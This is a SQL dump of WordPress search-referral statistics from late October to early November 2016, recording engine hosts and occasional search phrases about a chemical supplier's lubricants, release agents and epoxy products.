INSERT INTO `wp_statistics_search` VALUES (3437, '2016-10-31', 'google', 'www.google.com', '', 14189); 
INSERT INTO `wp_statistics_search` VALUES (3438, '2016-10-31', 'google', 'www.google.com', '', 14190); 
INSERT INTO `wp_statistics_search` VALUES (3439, '2016-10-31', 'google', 'www.google.com', '', 14191); 
INSERT INTO `wp_statistics_search` VALUES (3440, '2016-10-31', 'google', 'www.google.com', '', 14192); 
INSERT INTO `wp_statistics_search` VALUES (3441, '2016-10-31', 'google', 'www.google.com', '', 14197); 
INSERT INTO `wp_statistics_search` VALUES (3442, '2016-10-31', 'google', 'www.google.com', '', 14203); 
INSERT INTO `wp_statistics_search` VALUES (3443, '2016-10-31', 'google', 'www.google.com', '', 14208); 
INSERT INTO `wp_statistics_search` VALUES (3444, '2016-10-31', 'google', 'www.google.com', '', 14209); 
INSERT INTO `wp_statistics_search` VALUES (3445, '2016-10-31', 'google', 'www.google.ca', '', 14212); 
INSERT INTO `wp_statistics_search` VALUES (3446, '2016-10-31', 'google', 'www.google.com', '', 14213); 
INSERT INTO `wp_statistics_search` VALUES (3447, '2016-10-31', 'google', 'www.google.com', '', 14214); 
INSERT INTO `wp_statistics_search` VALUES (3448, '2016-10-31', 'google', 'www.google.ca', '', 14216); 
INSERT INTO `wp_statistics_search` VALUES (3449, '2016-10-31', 'google', 'www.google.com', '', 14219); 
INSERT INTO `wp_statistics_search` VALUES (3450, '2016-10-31', 'google', 'www.google.com', '', 14221); 
INSERT INTO `wp_statistics_search` VALUES (3451, '2016-10-31', 'google', 'www.google.ca', '', 14222); 
INSERT INTO `wp_statistics_search` VALUES (3452, '2016-10-31', 'google', 'www.google.com', '', 14224); 
INSERT INTO `wp_statistics_search` VALUES (3453, '2016-10-31', 'google', 'www.google.com', '', 14227); 
INSERT INTO `wp_statistics_search` VALUES (3454, '2016-10-31', 'google', 'www.google.com', '', 14229); 
INSERT INTO `wp_statistics_search` VALUES (3455, '2016-10-31', 'google', 'www.google.ca', '', 14231); 
INSERT INTO `wp_statistics_search` VALUES (3456, '2016-10-31', 'google', 'com.google.android.googlequicksearchbox', '', 14235); 
INSERT INTO `wp_statistics_search` VALUES (3457, '2016-10-31', 'google', 'www.google.com', '', 14237); 
INSERT INTO `wp_statistics_search` VALUES (3458, '2016-10-31', 'google', 'www.google.com', '', 14238); 
INSERT INTO `wp_statistics_search` VALUES (3459, '2016-10-31', 'google', 'www.google.com', '', 14246); 
INSERT INTO `wp_statistics_search` VALUES (3460, '2016-10-31', 'google', 'www.google.ca', '', 14247); 
INSERT INTO `wp_statistics_search` VALUES (3461, '2016-10-31', 'google', 'www.google.com.mx', '', 14248); 
INSERT INTO `wp_statistics_search` VALUES (3462, '2016-10-31', 'google', 'www.google.com', 'krytox grease', 14249); 
INSERT INTO `wp_statistics_search` VALUES (3463, '2016-10-31', 'google', 'www.google.com', '', 14250); 
INSERT INTO `wp_statistics_search` VALUES (3464, '2016-10-31', 'google', 'www.google.com.au', '', 14251); 
INSERT INTO `wp_statistics_search` VALUES (3465, '2016-10-31', 'google', 'www.google.com.au', '', 14253); 
INSERT INTO `wp_statistics_search` VALUES (3466, '2016-10-31', 'google', 'www.google.com', '', 14256); 
INSERT INTO `wp_statistics_search` VALUES (3467, '2016-10-31', 'google', 'www.google.com', '', 14257); 
INSERT INTO `wp_statistics_search` VALUES (3468, '2016-10-31', 'google', 'www.google.com', '', 14263); 
INSERT INTO `wp_statistics_search` VALUES (3469, '2016-10-31', 'google', 'www.google.com', '', 14264); 
INSERT INTO `wp_statistics_search` VALUES (3470, '2016-10-31', 'bing', 'www.bing.com', 'miller-stephenson chemical co', 14265); 
INSERT INTO `wp_statistics_search` VALUES (3471, '2016-10-31', 'bing', 'www.bing.com', 'heloxy modifier 61 sds', 14267); 
INSERT INTO `wp_statistics_search` VALUES (3472, '2016-10-31', 'google', 'www.google.com', '', 14274); 
INSERT INTO `wp_statistics_search` VALUES (3473, '2016-10-31', 'google', 'www.google.ca', '', 14275); 
INSERT INTO `wp_statistics_search` VALUES (3474, '2016-10-31', 'bing', 'www.bing.com', 'heloxy modifier 61 sds', 14276); 
INSERT INTO `wp_statistics_search` VALUES (3475, '2016-11-01', 'google', 'www.google.ca', '', 14294); 
INSERT INTO `wp_statistics_search` VALUES (3476, '2016-11-01', 'google', 'www.google.com', '', 14299); 
INSERT INTO `wp_statistics_search` VALUES (3477, '2016-11-01', 'google', 'www.google.com', '', 14302); 
INSERT INTO `wp_statistics_search` VALUES (3478, '2016-11-01', 'google', 'www.google.com.hk', '', 14307); 
INSERT INTO `wp_statistics_search` VALUES (3479, '2016-11-01', 'google', 'www.google.com', '', 14308); 
INSERT INTO `wp_statistics_search` VALUES (3480, '2016-11-01', 'google', 'www.google.com', '', 14313); 
INSERT INTO `wp_statistics_search` VALUES (3481, '2016-11-01', 'google', 'www.google.com', '', 14314); 
INSERT INTO `wp_statistics_search` VALUES (3482, '2016-11-01', 'google', 'www.google.co.jp', '', 14315); 
INSERT INTO `wp_statistics_search` VALUES (3483, '2016-11-01', 'google', 'www.google.com.sg', '', 14318); 
INSERT INTO `wp_statistics_search` VALUES (3484, '2016-11-01', 'google', 'www.google.com.tw', '', 14321); 
INSERT INTO `wp_statistics_search` VALUES (3485, '2016-11-01', 'google', 'www.google.ca', '', 14323); 
INSERT INTO `wp_statistics_search` VALUES (3486, '2016-11-01', 'google', 'www.google.ca', '', 14325); 
INSERT INTO `wp_statistics_search` VALUES (3487, '2016-11-01', 'bing', 'www.bing.com', 'vazo 67', 14337); 
INSERT INTO `wp_statistics_search` VALUES (3488, '2016-11-01', 'google', 'www.google.com', '', 14348); 
INSERT INTO `wp_statistics_search` VALUES (3489, '2016-11-01', 'google', 'www.google.co.in', '', 14352); 
INSERT INTO `wp_statistics_search` VALUES (3490, '2016-11-01', 'google', 'www.google.ca', '', 14361); 
INSERT INTO `wp_statistics_search` VALUES (3491, '2016-11-01', 'google', 'www.google.com', '', 14363); 
INSERT INTO `wp_statistics_search` VALUES (3492, '2016-11-01', 'google', 'www.google.si', '', 14370); 
INSERT INTO `wp_statistics_search` VALUES (3493, '2016-11-01', 'google', 'www.google.cz', '', 14372); 
INSERT INTO `wp_statistics_search` VALUES (3494, '2016-11-01', 'google', 'www.google.co.nz', '', 14373); 
INSERT INTO `wp_statistics_search` VALUES (3495, '2016-11-01', 'google', 'www.google.com', '', 14377); 
INSERT INTO `wp_statistics_search` VALUES (3496, '2016-11-01', 'google', 'www.google.se', '', 14379); 
INSERT INTO `wp_statistics_search` VALUES (3497, '2016-11-01', 'google', 'www.google.co.th', '', 14380); 
INSERT INTO `wp_statistics_search` VALUES (3498, '2016-11-01', 'google', 'www.google.com', '', 14384); 
INSERT INTO `wp_statistics_search` VALUES (3499, '2016-11-01', 'google', 'www.google.ch', '', 14386); 
INSERT INTO `wp_statistics_search` VALUES (3500, '2016-11-01', 'google', 'www.google.co.il', '', 14387); 
INSERT INTO `wp_statistics_search` VALUES (3501, '2016-11-01', 'google', 'www.google.com', '', 14390); 
INSERT INTO `wp_statistics_search` VALUES (3502, '2016-11-01', 'bing', 'www.bing.com', '', 14399); 
INSERT INTO `wp_statistics_search` VALUES (3503, '2016-11-01', 'google', 'www.google.com.br', '', 14404); 
INSERT INTO `wp_statistics_search` VALUES (3504, '2016-11-01', 'google', 'www.google.com', '', 14411); 
INSERT INTO `wp_statistics_search` VALUES (3505, '2016-11-01', 'google', 'www.google.com', '', 14417); 
INSERT INTO `wp_statistics_search` VALUES (3506, '2016-11-01', 'google', 'www.google.com', '', 14418); 
INSERT INTO `wp_statistics_search` VALUES (3507, '2016-11-01', 'google', 'www.google.cz', '', 14420); 
INSERT INTO `wp_statistics_search` VALUES (3508, '2016-11-01', 'google', 'www.google.com', '', 14421); 
INSERT INTO `wp_statistics_search` VALUES (3509, '2016-11-01', 'google', 'www.google.com', '', 14427); 
INSERT INTO `wp_statistics_search` VALUES (3510, '2016-11-01', 'baidu', 'www.baidu.com', '', 14428); 
INSERT INTO `wp_statistics_search` VALUES (3511, '2016-11-01', 'google', 'www.google.ca', '', 14429); 
INSERT INTO `wp_statistics_search` VALUES (3512, '2016-11-01', 'google', 'www.google.com', '', 14430); 
INSERT INTO `wp_statistics_search` VALUES (3513, '2016-11-01', 'google', 'www.google.com', '', 14432); 
INSERT INTO `wp_statistics_search` VALUES (3514, '2016-11-01', 'google', 'www.google.com', '', 14434); 
INSERT INTO `wp_statistics_search` VALUES (3515, '2016-11-01', 'google', 'www.google.ru', '', 14439); 
INSERT INTO `wp_statistics_search` VALUES (3516, '2016-11-01', 'google', 'www.google.com', '', 14440); 
INSERT INTO `wp_statistics_search` VALUES (3517, '2016-11-01', 'google', 'www.google.de', '', 14446); 
INSERT INTO `wp_statistics_search` VALUES (3518, '2016-11-01', 'google', 'www.google.com', '', 14449); 
INSERT INTO `wp_statistics_search` VALUES (3519, '2016-11-01', 'google', 'www.google.ca', '', 14450); 
INSERT INTO `wp_statistics_search` VALUES (3520, '2016-11-01', 'google', 'www.google.com', '', 14451); 
INSERT INTO `wp_statistics_search` VALUES (3521, '2016-11-01', 'google', 'www.google.com', '', 14452); 
INSERT INTO `wp_statistics_search` VALUES (3522, '2016-11-01', 'google', 'www.google.com', '', 14453); 
INSERT INTO `wp_statistics_search` VALUES (3523, '2016-11-01', 'google', 'www.google.com', '', 14457); 
INSERT INTO `wp_statistics_search` VALUES (3524, '2016-11-01', 'google', 'www.google.com', '', 14458); 
INSERT INTO `wp_statistics_search` VALUES (3525, '2016-11-01', 'google', 'www.google.com', '', 14459); 
INSERT INTO `wp_statistics_search` VALUES (3526, '2016-11-01', 'google', 'www.google.com', '', 14460); 
INSERT INTO `wp_statistics_search` VALUES (3527, '2016-11-01', 'google', 'www.google.com', '', 14463); 
INSERT INTO `wp_statistics_search` VALUES (3528, '2016-11-01', 'google', 'www.google.com', '', 14466); 
INSERT INTO `wp_statistics_search` VALUES (3529, '2016-11-01', 'google', 'www.google.com', '', 14467); 
INSERT INTO `wp_statistics_search` VALUES (3530, '2016-11-01', 'google', 'www.google.com', '', 14468); 
INSERT INTO `wp_statistics_search` VALUES (3531, '2016-11-01', 'bing', 'www.bing.com', '', 14470); 
INSERT INTO `wp_statistics_search` VALUES (3532, '2016-11-01', 'google', 'www.google.com.tr', '', 14475); 
INSERT INTO `wp_statistics_search` VALUES (3533, '2016-11-01', 'yahoo', 'r.search.yahoo.com', '', 14477); 
INSERT INTO `wp_statistics_search` VALUES (3534, '2016-11-01', 'google', 'www.google.com.tw', '', 14478); 
INSERT INTO `wp_statistics_search` VALUES (3535, '2016-11-01', 'google', 'www.google.com', '', 14479); 
INSERT INTO `wp_statistics_search` VALUES (3536, '2016-11-01', 'google', 'www.google.com', '', 14480); 
INSERT INTO `wp_statistics_search` VALUES (3537, '2016-11-01', 'google', 'www.google.com', '', 14481); 
INSERT INTO `wp_statistics_search` VALUES (3538, '2016-11-01', 'google', 'www.google.com', '', 14484); 
INSERT INTO `wp_statistics_search` VALUES (3539, '2016-11-01', 'google', 'www.google.com', '', 14488); 
INSERT INTO `wp_statistics_search` VALUES (3540, '2016-11-01', 'google', 'www.google.co.uk', '', 14490); 
INSERT INTO `wp_statistics_search` VALUES (3541, '2016-11-01', 'google', 'www.google.com', '', 14493); 
INSERT INTO `wp_statistics_search` VALUES (3542, '2016-11-01', 'google', 'www.google.com', '', 14495); 
INSERT INTO `wp_statistics_search` VALUES (3543, '2016-11-01', 'google', 'www.google.com', '', 14497); 
INSERT INTO `wp_statistics_search` VALUES (3544, '2016-11-01', 'google', 'www.google.com', '', 14498); 
INSERT INTO `wp_statistics_search` VALUES (3545, '2016-11-01', 'google', 'www.google.com', '', 14502); 
INSERT INTO `wp_statistics_search` VALUES (3546, '2016-11-01', 'google', 'www.google.com', '', 14503); 
INSERT INTO `wp_statistics_search` VALUES (3547, '2016-11-01', 'bing', 'www.bing.com', 'GPL-215', 14504); 
INSERT INTO `wp_statistics_search` VALUES (3548, '2016-11-01', 'google', 'www.google.com', '', 14508); 
INSERT INTO `wp_statistics_search` VALUES (3549, '2016-11-01', 'bing', 'www.bing.com', 'miller release agent', 14509); 
INSERT INTO `wp_statistics_search` VALUES (3550, '2016-11-01', 'google', 'www.google.co.uk', '', 14511); 
INSERT INTO `wp_statistics_search` VALUES (3551, '2016-11-01', 'google', 'www.google.com', '', 14514); 
INSERT INTO `wp_statistics_search` VALUES (3552, '2016-11-01', 'google', 'www.google.com', '', 14515); 
INSERT INTO `wp_statistics_search` VALUES (3553, '2016-11-01', 'google', 'www.google.ca', '', 14516); 
INSERT INTO `wp_statistics_search` VALUES (3554, '2016-11-01', 'google', 'www.google.com', '', 14521); 
INSERT INTO `wp_statistics_search` VALUES (3555, '2016-11-01', 'google', 'www.google.com', '', 14523); 
INSERT INTO `wp_statistics_search` VALUES (3556, '2016-11-01', 'google', 'www.google.com', '', 14525); 
INSERT INTO `wp_statistics_search` VALUES (3557, '2016-11-01', 'google', 'www.google.com', '', 14526); 
INSERT INTO `wp_statistics_search` VALUES (3558, '2016-11-01', 'google', 'www.google.com', '', 14528); 
INSERT INTO `wp_statistics_search` VALUES (3559, '2016-11-01', 'google', 'www.google.com', '', 14529); 
INSERT INTO `wp_statistics_search` VALUES (3560, '2016-11-01', 'google', 'www.google.com', '', 14531); 
INSERT INTO `wp_statistics_search` VALUES (3561, '2016-11-01', 'google', 'www.google.co.il', '', 14532); 
INSERT INTO `wp_statistics_search` VALUES (3562, '2016-11-01', 'google', 'www.google.com', '', 14533); 
INSERT INTO `wp_statistics_search` VALUES (3563, '2016-11-01', 'google', 'www.google.com', '', 14534); 
INSERT INTO `wp_statistics_search` VALUES (3564, '2016-11-01', 'google', 'www.google.com', '', 14535); 
INSERT INTO `wp_statistics_search` VALUES (3565, '2016-11-01', 'google', 'www.google.com', '', 14537); 
INSERT INTO `wp_statistics_search` VALUES (3566, '2016-11-01', 'google', 'www.google.com', '', 14539); 
INSERT INTO `wp_statistics_search` VALUES (3567, '2016-11-01', 'google', 'www.google.com', '', 14542); 
INSERT INTO `wp_statistics_search` VALUES (3568, '2016-11-01', 'google', 'www.google.com', '', 14543); 
INSERT INTO `wp_statistics_search` VALUES (3569, '2016-11-01', 'google', 'www.google.com.co', '', 14544); 
INSERT INTO `wp_statistics_search` VALUES (3570, '2016-11-01', 'google', 'www.google.ca', '', 14545); 
INSERT INTO `wp_statistics_search` VALUES (3571, '2016-11-01', 'google', 'www.google.com', '', 14546); 
INSERT INTO `wp_statistics_search` VALUES (3572, '2016-11-01', 'google', 'www.google.com', '', 14547); 
INSERT INTO `wp_statistics_search` VALUES (3573, '2016-11-01', 'google', 'www.google.com', '', 14552); 
INSERT INTO `wp_statistics_search` VALUES (3574, '2016-11-01', 'google', 'www.google.com', '', 14553); 
INSERT INTO `wp_statistics_search` VALUES (3575, '2016-11-01', 'yahoo', 'search.yahoo.com', '', 14558); 
INSERT INTO `wp_statistics_search` VALUES (3576, '2016-11-01', 'google', 'www.google.com', '', 14560); 
INSERT INTO `wp_statistics_search` VALUES (3577, '2016-11-01', 'google', 'www.google.ru', '', 14561); 
INSERT INTO `wp_statistics_search` VALUES (3578, '2016-11-01', 'google', 'www.google.com', '', 14563); 
INSERT INTO `wp_statistics_search` VALUES (3579, '2016-11-01', 'google', 'www.google.ca', '', 14566); 
INSERT INTO `wp_statistics_search` VALUES (3580, '2016-11-01', 'google', 'www.google.com', '', 14568); 
INSERT INTO `wp_statistics_search` VALUES (3581, '2016-11-01', 'google', 'www.google.com', '', 14569); 
INSERT INTO `wp_statistics_search` VALUES (3582, '2016-11-01', 'google', 'www.google.com.br', '', 14572); 
INSERT INTO `wp_statistics_search` VALUES (3583, '2016-11-01', 'google', 'www.google.com', '', 14573); 
INSERT INTO `wp_statistics_search` VALUES (3584, '2016-11-01', 'google', 'www.google.com', '', 14577); 
INSERT INTO `wp_statistics_search` VALUES (3585, '2016-11-01', 'google', 'www.google.com', '', 14582); 
INSERT INTO `wp_statistics_search` VALUES (3586, '2016-11-01', 'google', 'www.google.com', '', 14583); 
INSERT INTO `wp_statistics_search` VALUES (3587, '2016-11-01', 'google', 'www.google.com', '', 14585); 
INSERT INTO `wp_statistics_search` VALUES (3588, '2016-11-01', 'google', 'www.google.com', '', 14586); 
INSERT INTO `wp_statistics_search` VALUES (3589, '2016-11-01', 'google', 'www.google.com', '', 14588); 
INSERT INTO `wp_statistics_search` VALUES (3590, '2016-11-01', 'google', 'www.google.com', '', 14590); 
INSERT INTO `wp_statistics_search` VALUES (3591, '2016-11-01', 'google', 'www.google.com', '', 14591); 
INSERT INTO `wp_statistics_search` VALUES (3592, '2016-11-01', 'bing', 'www.bing.com', 'ms-262 miller stephenson', 14592); 
INSERT INTO `wp_statistics_search` VALUES (3593, '2016-11-01', 'google', 'www.google.com', '', 14595); 
INSERT INTO `wp_statistics_search` VALUES (3594, '2016-11-01', 'google', 'www.google.com', '', 14596); 
INSERT INTO `wp_statistics_search` VALUES (3595, '2016-11-01', 'google', 'cse.google.com', '', 14597); 
INSERT INTO `wp_statistics_search` VALUES (3596, '2016-11-01', 'google', 'www.google.com.mx', '', 14599); 
INSERT INTO `wp_statistics_search` VALUES (3597, '2016-11-01', 'google', 'www.google.com', '', 14600); 
INSERT INTO `wp_statistics_search` VALUES (3598, '2016-11-01', 'google', 'www.google.com', '', 14601); 
INSERT INTO `wp_statistics_search` VALUES (3599, '2016-11-01', 'google', 'www.google.com', '', 14604); 
INSERT INTO `wp_statistics_search` VALUES (3600, '2016-11-01', 'google', 'com.google.android.googlequicksearchbox', '', 14607); 
INSERT INTO `wp_statistics_search` VALUES (3601, '2016-11-01', 'google', 'www.google.com', '', 14608); 
INSERT INTO `wp_statistics_search` VALUES (3602, '2016-11-01', 'google', 'www.google.com', '', 14618); 
INSERT INTO `wp_statistics_search` VALUES (3603, '2016-11-01', 'google', 'www.google.ca', '', 14621); 
INSERT INTO `wp_statistics_search` VALUES (3604, '2016-11-01', 'bing', 'www.bing.com', 'tfe release agent/dry lubricant', 14623); 
INSERT INTO `wp_statistics_search` VALUES (3605, '2016-11-01', 'google', 'www.google.com', '', 14624); 
INSERT INTO `wp_statistics_search` VALUES (3606, '2016-11-01', 'google', 'www.google.com', '', 14625); 
INSERT INTO `wp_statistics_search` VALUES (3607, '2016-11-01', 'google', 'www.google.com', '', 14627); 
INSERT INTO `wp_statistics_search` VALUES (3608, '2016-11-01', 'google', 'www.google.com', '', 14629); 
INSERT INTO `wp_statistics_search` VALUES (3609, '2016-11-01', 'google', 'www.google.com', '', 14630); 
INSERT INTO `wp_statistics_search` VALUES (3610, '2016-11-01', 'google', 'www.google.com', '', 14631); 
INSERT INTO `wp_statistics_search` VALUES (3611, '2016-11-01', 'google', 'www.google.com', '', 14633); 
INSERT INTO `wp_statistics_search` VALUES (3612, '2016-11-01', 'google', 'www.google.com', '', 14634); 
INSERT INTO `wp_statistics_search` VALUES (3613, '2016-11-01', 'google', 'www.google.com', '', 14639); 
INSERT INTO `wp_statistics_search` VALUES (3614, '2016-11-01', 'google', 'www.google.com', '', 14640); 
INSERT INTO `wp_statistics_search` VALUES (3615, '2016-11-01', 'google', 'www.google.com', '', 14641); 
INSERT INTO `wp_statistics_search` VALUES (3616, '2016-11-01', 'google', 'www.google.com', '', 14645); 
INSERT INTO `wp_statistics_search` VALUES (3617, '2016-11-01', 'google', 'www.google.com', '', 14646); 
INSERT INTO `wp_statistics_search` VALUES (3618, '2016-11-01', 'google', 'www.google.com', '', 14647); 
INSERT INTO `wp_statistics_search` VALUES (3619, '2016-11-01', 'google', 'www.google.com', '', 14649); 
INSERT INTO `wp_statistics_search` VALUES (3620, '2016-11-01', 'google', 'www.google.com', '', 14650); 
INSERT INTO `wp_statistics_search` VALUES (3621, '2016-11-01', 'google', 'www.google.com', '', 14654); 
INSERT INTO `wp_statistics_search` VALUES (3622, '2016-11-01', 'google', 'www.google.com', '', 14655); 
INSERT INTO `wp_statistics_search` VALUES (3623, '2016-11-01', 'google', 'www.google.com', '', 14656); 
INSERT INTO `wp_statistics_search` VALUES (3624, '2016-11-01', 'google', 'www.google.com', '', 14657); 
INSERT INTO `wp_statistics_search` VALUES (3625, '2016-11-01', 'bing', 'www.bing.com', 'Miller Stephenson SDS', 14662); 
INSERT INTO `wp_statistics_search` VALUES (3626, '2016-11-01', 'google', 'google.com', '', 14664); 
INSERT INTO `wp_statistics_search` VALUES (3627, '2016-11-01', 'bing', 'www.bing.com', 'Miller-Stephenson solvents', 14665); 
INSERT INTO `wp_statistics_search` VALUES (3628, '2016-11-01', 'bing', 'www.bing.com', 'miller-stephenson', 14670); 
INSERT INTO `wp_statistics_search` VALUES (3629, '2016-11-01', 'google', 'www.google.ca', '', 14673); 
INSERT INTO `wp_statistics_search` VALUES (3630, '2016-11-01', 'google', 'www.google.com', '', 14674); 
INSERT INTO `wp_statistics_search` VALUES (3631, '2016-11-01', 'google', 'www.google.com', '', 14676); 
INSERT INTO `wp_statistics_search` VALUES (3632, '2016-11-01', 'google', 'www.google.com', '', 14677); 
INSERT INTO `wp_statistics_search` VALUES (3633, '2016-11-01', 'google', 'www.google.com', '', 14678); 
INSERT INTO `wp_statistics_search` VALUES (3634, '2016-11-01', 'google', 'www.google.com', '', 14687); 
INSERT INTO `wp_statistics_search` VALUES (3635, '2016-11-01', 'google', 'www.google.com.tr', '', 14688); 
INSERT INTO `wp_statistics_search` VALUES (3636, '2016-11-01', 'google', 'www.google.com', '', 14689); 
INSERT INTO `wp_statistics_search` VALUES (3637, '2016-11-01', 'google', 'www.google.com', '', 14690); 
INSERT INTO `wp_statistics_search` VALUES (3638, '2016-11-02', 'google', 'www.google.com', '', 14691); 
INSERT INTO `wp_statistics_search` VALUES (3639, '2016-11-02', 'google', 'www.google.com.hk', '', 14694); 
INSERT INTO `wp_statistics_search` VALUES (3640, '2016-11-02', 'google', 'www.google.co.kr', '', 14697); 
INSERT INTO `wp_statistics_search` VALUES (3641, '2016-11-02', 'google', 'www.google.ca', '', 14698); 
INSERT INTO `wp_statistics_search` VALUES (3642, '2016-11-02', 'google', 'www.google.com', '', 14700); 
INSERT INTO `wp_statistics_search` VALUES (3643, '2016-11-02', 'google', 'www.google.com.tw', '', 14703); 
INSERT INTO `wp_statistics_search` VALUES (3644, '2016-11-02', 'google', 'www.google.com', '', 14718); 
INSERT INTO `wp_statistics_search` VALUES (3645, '2016-11-02', 'google', 'www.google.tt', '', 14721); 
INSERT INTO `wp_statistics_search` VALUES (3646, '2016-11-02', 'google', 'www.google.com', '', 14723); 
INSERT INTO `wp_statistics_search` VALUES (3647, '2016-11-02', 'google', 'www.google.com.au', '', 14728); 
INSERT INTO `wp_statistics_search` VALUES (3648, '2016-11-02', 'google', 'www.google.com', '', 14731); 
INSERT INTO `wp_statistics_search` VALUES (3649, '2016-11-02', 'yahoo', 'search.yahoo.com', '', 14734); 
INSERT INTO `wp_statistics_search` VALUES (3650, '2016-11-02', 'google', 'www.google.ca', '', 14736); 
INSERT INTO `wp_statistics_search` VALUES (3651, '2016-11-02', 'google', 'www.google.com', '', 14737); 
INSERT INTO `wp_statistics_search` VALUES (3652, '2016-11-02', 'bing', 'www.bing.com', 'azo compounds free radical initiators', 14740); 
INSERT INTO `wp_statistics_search` VALUES (3653, '2016-11-02', 'google', 'www.google.ca', '', 14744); 
INSERT INTO `wp_statistics_search` VALUES (3654, '2016-11-02', 'google', 'www.google.com.tw', '', 14745); 
INSERT INTO `wp_statistics_search` VALUES (3655, '2016-11-02', 'google', 'www.google.com', '', 14747); 
INSERT INTO `wp_statistics_search` VALUES (3656, '2016-11-02', 'google', 'www.google.com', '', 14753); 
INSERT INTO `wp_statistics_search` VALUES (3657, '2016-11-02', 'google', 'www.google.co.uk', '', 14758); 
INSERT INTO `wp_statistics_search` VALUES (3658, '2016-11-02', 'google', 'www.google.co.jp', '', 14768); 
INSERT INTO `wp_statistics_search` VALUES (3659, '2016-11-02', 'google', 'www.google.com.tw', '', 14772); 
INSERT INTO `wp_statistics_search` VALUES (3660, '2016-11-02', 'google', 'www.google.fr', '', 14774); 
INSERT INTO `wp_statistics_search` VALUES (3661, '2016-11-02', 'google', 'www.google.co.kr', '', 14778); 
INSERT INTO `wp_statistics_search` VALUES (3662, '2016-11-02', 'google', 'www.google.ro', '', 14785); 
INSERT INTO `wp_statistics_search` VALUES (3663, '2016-11-02', 'google', 'www.google.co.uk', '', 14787); 
INSERT INTO `wp_statistics_search` VALUES (3664, '2016-11-02', 'google', 'www.google.co.uk', '', 14790); 
INSERT INTO `wp_statistics_search` VALUES (3665, '2016-11-02', 'google', 'www.google.at', '', 14793); 
INSERT INTO `wp_statistics_search` VALUES (3666, '2016-11-02', 'google', 'www.google.com', '', 14794); 
INSERT INTO `wp_statistics_search` VALUES (3667, '2016-11-02', 'google', 'www.google.co.in', '', 14795); 
INSERT INTO `wp_statistics_search` VALUES (3668, '2016-11-02', 'google', 'www.google.com', '', 14803); 
INSERT INTO `wp_statistics_search` VALUES (3669, '2016-11-02', 'bing', 'www.bing.com', 'Miller-Stephenson Chemical', 14805); 
INSERT INTO `wp_statistics_search` VALUES (3670, '2016-11-02', 'google', 'www.google.com', '', 14808); 
INSERT INTO `wp_statistics_search` VALUES (3671, '2016-11-02', 'google', 'www.google.co.in', '', 14810); 
INSERT INTO `wp_statistics_search` VALUES (3672, '2016-11-02', 'google', 'www.google.com', '', 14811); 
INSERT INTO `wp_statistics_search` VALUES (3673, '2016-11-02', 'google', 'www.google.com', '', 14812); 
INSERT INTO `wp_statistics_search` VALUES (3674, '2016-11-02', 'google', 'www.google.com', '', 14813); 
INSERT INTO `wp_statistics_search` VALUES (3675, '2016-11-02', 'google', 'www.google.com', '', 14816); 
INSERT INTO `wp_statistics_search` VALUES (3676, '2016-11-02', 'google', 'www.google.com', '', 14818); 
INSERT INTO `wp_statistics_search` VALUES (3677, '2016-11-02', 'google', 'www.google.com', '', 14819); 
INSERT INTO `wp_statistics_search` VALUES (3678, '2016-11-02', 'google', 'www.google.com.sg', '', 14821); 
INSERT INTO `wp_statistics_search` VALUES (3679, '2016-11-02', 'bing', 'www.bing.com', 'Miller Stephenson Epoxy 907', 14825); 
INSERT INTO `wp_statistics_search` VALUES (3680, '2016-11-02', 'google', 'www.google.fr', '', 14827); 
INSERT INTO `wp_statistics_search` VALUES (3681, '2016-11-02', 'google', 'www.google.co.uk', '', 14834); 
INSERT INTO `wp_statistics_search` VALUES (3682, '2016-11-02', 'google', 'www.google.com.tw', '', 14845); 
INSERT INTO `wp_statistics_search` VALUES (3683, '2016-11-02', 'google', 'www.google.com', '', 14847); 
INSERT INTO `wp_statistics_search` VALUES (3684, '2016-11-02', 'google', 'www.google.com', '', 14852); 
INSERT INTO `wp_statistics_search` VALUES (3685, '2016-11-02', 'google', 'www.google.com', '', 14853); 
INSERT INTO `wp_statistics_search` VALUES (3686, '2016-11-02', 'google', 'www.google.com', '', 14858); 
INSERT INTO `wp_statistics_search` VALUES (3687, '2016-11-02', 'google', 'www.google.ca', '', 14859); 
INSERT INTO `wp_statistics_search` VALUES (3688, '2016-11-02', 'google', 'www.google.ca', '', 14862); 
INSERT INTO `wp_statistics_search` VALUES (3689, '2016-11-02', 'google', 'www.google.com', '', 14865); 
INSERT INTO `wp_statistics_search` VALUES (3690, '2016-11-02', 'google', 'www.google.gr', '', 14867); 
INSERT INTO `wp_statistics_search` VALUES (3691, '2016-11-02', 'google', 'www.google.com', '', 14872); 
INSERT INTO `wp_statistics_search` VALUES (3692, '2016-11-02', 'google', 'www.google.com', '', 14875); 
INSERT INTO `wp_statistics_search` VALUES (3693, '2016-11-02', 'google', 'www.google.com', '', 14876); 
INSERT INTO `wp_statistics_search` VALUES (3694, '2016-11-02', 'google', 'www.google.com', '', 14877); 
INSERT INTO `wp_statistics_search` VALUES (3695, '2016-11-02', 'google', 'www.google.com', '', 14880); 
INSERT INTO `wp_statistics_search` VALUES (3696, '2016-11-02', 'google', 'www.google.com', '', 14882); 
INSERT INTO `wp_statistics_search` VALUES (3697, '2016-11-02', 'yahoo', 'tw.search.yahoo.com', '', 14884); 
INSERT INTO `wp_statistics_search` VALUES (3698, '2016-11-02', 'google', 'www.google.com', '', 14885); 
INSERT INTO `wp_statistics_search` VALUES (3699, '2016-11-02', 'google', 'www.google.com', '', 14887); 
INSERT INTO `wp_statistics_search` VALUES (3700, '2016-11-02', 'google', 'www.google.com', '', 14889); 
INSERT INTO `wp_statistics_search` VALUES (3701, '2016-11-02', 'bing', 'www.bing.com', 'krytox gol-215', 14890); 
INSERT INTO `wp_statistics_search` VALUES (3702, '2016-11-02', 'google', 'www.google.com', '', 14891); 
INSERT INTO `wp_statistics_search` VALUES (3703, '2016-11-02', 'google', 'www.google.it', '', 14892); 
INSERT INTO `wp_statistics_search` VALUES (3704, '2016-11-02', 'google', 'www.google.com', '', 14893); 
INSERT INTO `wp_statistics_search` VALUES (3705, '2016-11-02', 'google', 'www.google.com', '', 14895); 
INSERT INTO `wp_statistics_search` VALUES (3706, '2016-11-02', 'google', 'www.google.com', '', 14896); 
INSERT INTO `wp_statistics_search` VALUES (3707, '2016-11-02', 'google', 'www.google.com', '', 14900); 
INSERT INTO `wp_statistics_search` VALUES (3708, '2016-11-02', 'google', 'www.google.it', '', 14901); 
INSERT INTO `wp_statistics_search` VALUES (3709, '2016-11-02', 'google', 'www.google.com', '', 14904); 
INSERT INTO `wp_statistics_search` VALUES (3710, '2016-11-02', 'google', 'www.google.com', '', 14905); 
INSERT INTO `wp_statistics_search` VALUES (3711, '2016-11-02', 'google', 'www.google.com', '', 14908); 
